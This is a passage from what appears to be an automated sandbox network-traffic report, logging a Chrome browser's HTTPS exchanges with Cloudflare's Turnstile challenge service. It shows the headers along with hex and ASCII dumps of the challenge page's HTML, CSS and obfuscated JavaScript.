                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  referrer-policy: same-origin
                                                                  document-policy: js-profiling
                                                                  2025-01-13 21:52:29 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 38 39 64 31 38 64 62 37 64 63 34 31 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: Server: cloudflareCF-RAY: 90189d18db7dc411-EWRalt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:29 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.449764104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:30 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90189d18db7dc411&lang=auto HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:30 UTC331INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:30 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 113498
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d1cfe8842b9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:30 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64
                                                                  Data Ascii: 20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_overrun_d
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 2c 66 55 2c 67 31 2c 67 37 2c 67 38 2c 67 79 2c 67 7a 2c 67 44 2c 67 45 2c 67 35 2c 67 36 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 30 38 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 36 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 36 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 38 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 39 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 30 39 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38
                                                                  Data Ascii: ,fU,g1,g7,g8,gy,gz,gD,gE,g5,g6){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(508))/1*(-parseInt(gI(1256))/2)+parseInt(gI(936))/3+parseInt(gI(668))/4+-parseInt(gI(698))/5*(parseInt(gI(999))/6)+-parseInt(gI(1009))/7+parseInt(gI(8
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 46 48 69 43 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 53 6c 71 6b 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 54 64 45 51 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4b 28 31 31 36 32 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4c 29 7b 72 65 74 75 72 6e 20 67 4c 3d 62 2c 67 4c 28 31 34 35 32 29 5b 67 4c 28 38 37 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66
                                                                  Data Ascii: ':function(h,i){return i==h},'FHiCB':function(h,i){return i==h},'Slqku':function(h,i){return h===i},'TdEQi':function(h,i){return h+i}},e=String[gK(1162)],f={'h':function(h){return null==h?'':f.g(h,6,function(i,gL){return gL=b,gL(1452)[gL(879)](i)})},'g':f
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 36 39 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 67 4d 28 31 33 38 35 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4d 28 31 32 38 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4d 28 36 36 39 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 67 4d 28 31 35 36 39 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 67 4d 28 34 33 33 29 5d 28 48 3c 3c 31 2e 31 39 2c 64 5b 67 4d 28 39 36 32 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 64 5b 67 4d 28 31 34 39 38 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 67 4d 28 31 32 38 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 4d 28 31
                                                                  Data Ascii: 69)](0)){for(s=0;s<F;H<<=1,d[gM(1385)](I,j-1)?(I=0,G[gM(1289)](o(H)),H=0):I++,s++);for(M=C[gM(669)](0),s=0;d[gM(1569)](8,s);H=d[gM(433)](H<<1.19,d[gM(962)](M,1)),I==d[gM(1498)](j,1)?(I=0,G[gM(1289)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=d[gM(1
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 31 33 37 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 67 50 28 31 34 34 30 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 67 50 28 39 36 32 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 67 50 28 33 35 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 50 28 31 30 34 30 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 67 50 28 31 32 38 39 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72
                                                                  Data Ascii: +)),J|=(0<L?1:0)*F,F<<=1);M=e(J);break;case 1:for(J=0,K=Math[gP(1375)](2,16),F=1;d[gP(1440)](F,K);L=d[gP(962)](G,H),H>>=1,d[gP(352)](0,H)&&(H=j,G=o(I++)),J|=d[gP(1040)](0<L?1:0,F),F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[gP(1289)](M);;){if(I>i)r
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 32 35 35 29 2c 6a 29 2c 69 25 36 35 35 33 35 29 2c 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 67 51 28 32 38 35 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4a 28 31 33 30 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 53 2c 64 2c 65 2c 66 2c 67 29 7b 67 53 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 67 53 28 33 38 32 29 5d 3d 67 53 28 31 33 35 36 29 2c 64 5b 67 53 28 31 34 34 33 29 5d 3d 67 53 28 39 32 35 29 2c 64 5b 67 53 28 31 30 32 36 29 5d 3d 67 53 28 33 35 31 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 67 53 28 39 34 37 29 5d 5b 67 53 28 38 33 33 29 5d 28 32 2e 33 34 3c 3c 66 2c 33 32 29 2c 65 4d 5b 67 53 28 37 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 69 66 28 67 54 3d 67 53 2c 65 5b 67 54 28 33 38 32 29 5d 21 3d 3d 67 54
                                                                  Data Ascii: 255),j),i%65535),65535)%255)));return k[gQ(285)]('')},eM[gJ(1307)]=function(gS,d,e,f,g){gS=gJ,d={},d[gS(382)]=gS(1356),d[gS(1443)]=gS(925),d[gS(1026)]=gS(351),e=d,f=1,g=1e3*eM[gS(947)][gS(833)](2.34<<f,32),eM[gS(777)](function(gT){if(gT=gS,e[gT(382)]!==gT
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 67 55 28 35 33 31 29 5d 28 27 2b 27 2c 67 55 28 36 33 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 67 55 28 34 38 31 29 5d 3d 65 4d 5b 67 55 28 39 35 32 29 5d 5b 67 55 28 34 38 31 29 5d 2c 78 5b 67 55 28 31 34 33 33 29 5d 3d 65 4d 5b 67 55 28 39 35 32 29 5d 5b 67 55 28 31 34 33 33 29 5d 2c 78 5b 67 55 28 31 32 38 37 29 5d 3d 65 4d 5b 67 55 28 39 35 32 29 5d 5b 67 55 28 31 32 38 37 29 5d 2c 78 5b 67 55 28 39 39 32 29 5d 3d 65 4d 5b 67 55 28 39 35 32 29 5d 5b 67 55 28 31 35 34 31 29 5d 2c 78 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 43 3d 69 5b 67 55 28 34 30 38 29 5d 28 68 2c 69 5b 67 55 28 31 33 36 35 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 44 3d 6e 65 77 20 65 4d 5b 28
                                                                  Data Ascii: gU(531)]('+',gU(635));continue;case'7':B=(x={},x[gU(481)]=eM[gU(952)][gU(481)],x[gU(1433)]=eM[gU(952)][gU(1433)],x[gU(1287)]=eM[gU(952)][gU(1287)],x[gU(992)]=eM[gU(952)][gU(1541)],x);continue;case'8':C=i[gU(408)](h,i[gU(1365)]);continue;case'9':D=new eM[(
